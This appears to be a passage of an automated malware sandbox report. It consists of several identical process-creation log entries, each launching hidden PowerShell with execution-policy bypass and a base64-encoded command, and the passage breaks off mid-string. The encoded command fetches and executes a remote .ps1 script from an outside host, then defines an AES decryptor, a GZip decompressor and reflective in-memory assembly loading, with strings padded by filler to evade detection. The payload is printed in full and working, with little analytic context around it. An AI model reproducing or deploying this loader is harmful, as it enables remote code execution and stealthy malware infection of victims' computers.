Nwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsY